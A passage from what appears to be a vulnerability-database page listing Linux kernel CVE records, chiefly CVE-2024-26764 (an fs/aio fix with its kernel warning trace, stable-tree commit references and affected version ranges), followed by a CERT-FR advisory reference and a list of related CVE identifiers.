\u00272\u0027."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-23T16:39:56.807Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/10d75984495f7fe62152c3b0dbfa3f0a6b739c9b"
        },
        {
          "url": "https://git.kernel.org/stable/c/99fb654d01dc3f08b5905c663ad6c89a9d83302f"
        },
        {
          "url": "https://git.kernel.org/stable/c/c6f8b3fcc62725e4129f2c0fd550d022d4a7685a"
        },
        {
          "url": "https://git.kernel.org/stable/c/e4cf8941664cae2f89f0189c29fe2ce8c6be0d03"
        },
        {
          "url": "https://git.kernel.org/stable/c/b7d2eee1f53899b53f069bba3a59a419fc3d331b"
        },
        {
          "url": "https://git.kernel.org/stable/c/8f5b860de87039b007e84a28a5eefc888154e098"
        },
        {
          "url": "https://git.kernel.org/stable/c/edcf9725150e42beeca42d085149f4c88fa97afd"
        }
      ],
      "title": "nfsd: fix RELEASE_LOCKOWNER",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26629",
    "datePublished": "2024-03-13T14:01:49.452Z",
    "dateReserved": "2024-02-19T14:20:24.135Z",
    "dateUpdated": "2025-12-23T16:39:56.807Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26764 (GCVE-0-2024-26764)

Vulnerability from cvelistv5 – Published: 2024-04-03 17:00 – Updated: 2026-01-05 10:34

Title

fs/aio: Restrict kiocb_set_cancel_fn() to I/O submitted via libaio

Summary

In the Linux kernel, the following vulnerability has been resolved: fs/aio: Restrict kiocb_set_cancel_fn() to I/O submitted via libaio If kiocb_set_cancel_fn() is called for I/O submitted via io_uring, the following kernel warning appears: WARNING: CPU: 3 PID: 368 at fs/aio.c:598 kiocb_set_cancel_fn+0x9c/0xa8 Call trace: kiocb_set_cancel_fn+0x9c/0xa8 ffs_epfile_read_iter+0x144/0x1d0 io_read+0x19c/0x498 io_issue_sqe+0x118/0x27c io_submit_sqes+0x25c/0x5fc __arm64_sys_io_uring_enter+0x104/0xab0 invoke_syscall+0x58/0x11c el0_svc_common+0xb4/0xf4 do_el0_svc+0x2c/0xb0 el0_svc+0x2c/0xa4 el0t_64_sync_handler+0x68/0xb4 el0t_64_sync+0x1a4/0x1a8 Fix this by setting the IOCB_AIO_RW flag for read and write I/O that is submitted by libaio.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/337b543e274fe7a8f…
	https://git.kernel.org/stable/c/b4eea7a05ee0ab5ab…
	https://git.kernel.org/stable/c/ea1cd64d59f22d6d1…
	https://git.kernel.org/stable/c/d7b6fa97ec894edd0…
	https://git.kernel.org/stable/c/18f614369def2a11a…
	https://git.kernel.org/stable/c/e7e23fc5d5fe42282…
	https://git.kernel.org/stable/c/1dc7d74fe456944a9…
	https://git.kernel.org/stable/c/b820de741ae48ccf5…

Impacted products

	Vendor	Product	Version
	Linux	Linux	Affected: 04b2fa9f8f36ec6fb6fd1c9dc9df6fff0cd27323 , < 337b543e274fe7a8f47df3c8293cc6686ffa620f (git) Affected: 04b2fa9f8f36ec6fb6fd1c9dc9df6fff0cd27323 , < b4eea7a05ee0ab5ab0514421e6ba8c5d249cf942 (git) Affected: 04b2fa9f8f36ec6fb6fd1c9dc9df6fff0cd27323 , < ea1cd64d59f22d6d13f367d62ec6e27b9344695f (git) Affected: 04b2fa9f8f36ec6fb6fd1c9dc9df6fff0cd27323 , < d7b6fa97ec894edd02f64b83e5e72e1aa352f353 (git) Affected: 04b2fa9f8f36ec6fb6fd1c9dc9df6fff0cd27323 , < 18f614369def2a11a52f569fe0f910b199d13487 (git) Affected: 04b2fa9f8f36ec6fb6fd1c9dc9df6fff0cd27323 , < e7e23fc5d5fe422827c9a43ecb579448f73876c7 (git) Affected: 04b2fa9f8f36ec6fb6fd1c9dc9df6fff0cd27323 , < 1dc7d74fe456944a9b1c57bd776280249f441ac6 (git) Affected: 04b2fa9f8f36ec6fb6fd1c9dc9df6fff0cd27323 , < b820de741ae48ccf50dd95e297889c286ff4f760 (git)

CERTFR-2024-AVI-0645

Solutions

Action not permitted

CERTFR-2024-AVI-0645

Solutions

CVE-2023-52880 (GCVE-0-2023-52880)

CVE-2024-26813 (GCVE-0-2024-26813)

CVE-2024-35960 (GCVE-0-2024-35960)

CVE-2024-26885 (GCVE-0-2024-26885)

CVE-2024-27014 (GCVE-0-2024-27014)

CVE-2024-35877 (GCVE-0-2024-35877)

CVE-2024-35942 (GCVE-0-2024-35942)

CVE-2024-26752 (GCVE-0-2024-26752)

CVE-2024-26950 (GCVE-0-2024-26950)

CVE-2024-26744 (GCVE-0-2024-26744)

CVE-2024-26743 (GCVE-0-2024-26743)

CVE-2024-23307 (GCVE-0-2024-23307)

CVE-2024-35861 (GCVE-0-2024-35861)

CVE-2024-26985 (GCVE-0-2024-26985)

CVE-2024-35946 (GCVE-0-2024-35946)

CVE-2024-35978 (GCVE-0-2024-35978)

CVE-2024-35927 (GCVE-0-2024-35927)

CVE-2024-35930 (GCVE-0-2024-35930)

CVE-2024-26845 (GCVE-0-2024-26845)

CVE-2024-27018 (GCVE-0-2024-27018)

CVE-2024-35845 (GCVE-0-2024-35845)

CVE-2024-25742 (GCVE-0-2024-25742)

CVE-2024-35891 (GCVE-0-2024-35891)

CVE-2024-35970 (GCVE-0-2024-35970)

CVE-2024-26840 (GCVE-0-2024-26840)

CVE-2024-27390 (GCVE-0-2024-27390)

CVE-2024-36004 (GCVE-0-2024-36004)

CVE-2024-26952 (GCVE-0-2024-26952)

CVE-2024-26969 (GCVE-0-2024-26969)

CVE-2023-52620 (GCVE-0-2023-52620)

CVE-2024-26747 (GCVE-0-2024-26747)

CVE-2024-26788 (GCVE-0-2024-26788)

CVE-2024-27065 (GCVE-0-2024-27065)

CVE-2024-35821 (GCVE-0-2024-35821)

CVE-2024-35895 (GCVE-0-2024-35895)

CVE-2024-35968 (GCVE-0-2024-35968)

CVE-2024-35975 (GCVE-0-2024-35975)

CVE-2024-35796 (GCVE-0-2024-35796)

CVE-2024-36018 (GCVE-0-2024-36018)

CVE-2023-52443 (GCVE-0-2023-52443)

CVE-2024-35864 (GCVE-0-2024-35864)

CVE-2024-36008 (GCVE-0-2024-36008)

CVE-2024-26774 (GCVE-0-2024-26774)

CVE-2024-26903 (GCVE-0-2024-26903)

CVE-2024-27436 (GCVE-0-2024-27436)

CVE-2024-35936 (GCVE-0-2024-35936)

CVE-2022-38096 (GCVE-0-2022-38096)

CVE-2024-26863 (GCVE-0-2024-26863)

CVE-2024-35830 (GCVE-0-2024-35830)

CVE-2024-35997 (GCVE-0-2024-35997)

CVE-2024-26736 (GCVE-0-2024-26736)

CVE-2024-26870 (GCVE-0-2024-26870)

CVE-2024-27004 (GCVE-0-2024-27004)

CVE-2024-27009 (GCVE-0-2024-27009)

CVE-2024-26839 (GCVE-0-2024-26839)

CVE-2024-35940 (GCVE-0-2024-35940)

CVE-2024-35952 (GCVE-0-2024-35952)

CVE-2024-35938 (GCVE-0-2024-35938)

CVE-2024-35909 (GCVE-0-2024-35909)

CVE-2024-27396 (GCVE-0-2024-27396)

CVE-2024-35815 (GCVE-0-2024-35815)

CVE-2024-26922 (GCVE-0-2024-26922)

CVE-2024-35989 (GCVE-0-2024-35989)

CVE-2024-35851 (GCVE-0-2024-35851)

CVE-2024-26875 (GCVE-0-2024-26875)

CVE-2024-26965 (GCVE-0-2024-26965)

CVE-2024-26583 (GCVE-0-2024-26583)

CVE-2024-26585 (GCVE-0-2024-26585)

CVE-2024-35860 (GCVE-0-2024-35860)

CVE-2024-36019 (GCVE-0-2024-36019)

CVE-2024-26584 (GCVE-0-2024-26584)

CVE-2024-35883 (GCVE-0-2024-35883)

CVE-2024-35920 (GCVE-0-2024-35920)

CVE-2024-21823 (GCVE-0-2024-21823)

CVE-2024-27039 (GCVE-0-2024-27039)

CVE-2024-35854 (GCVE-0-2024-35854)

CVE-2024-35904 (GCVE-0-2024-35904)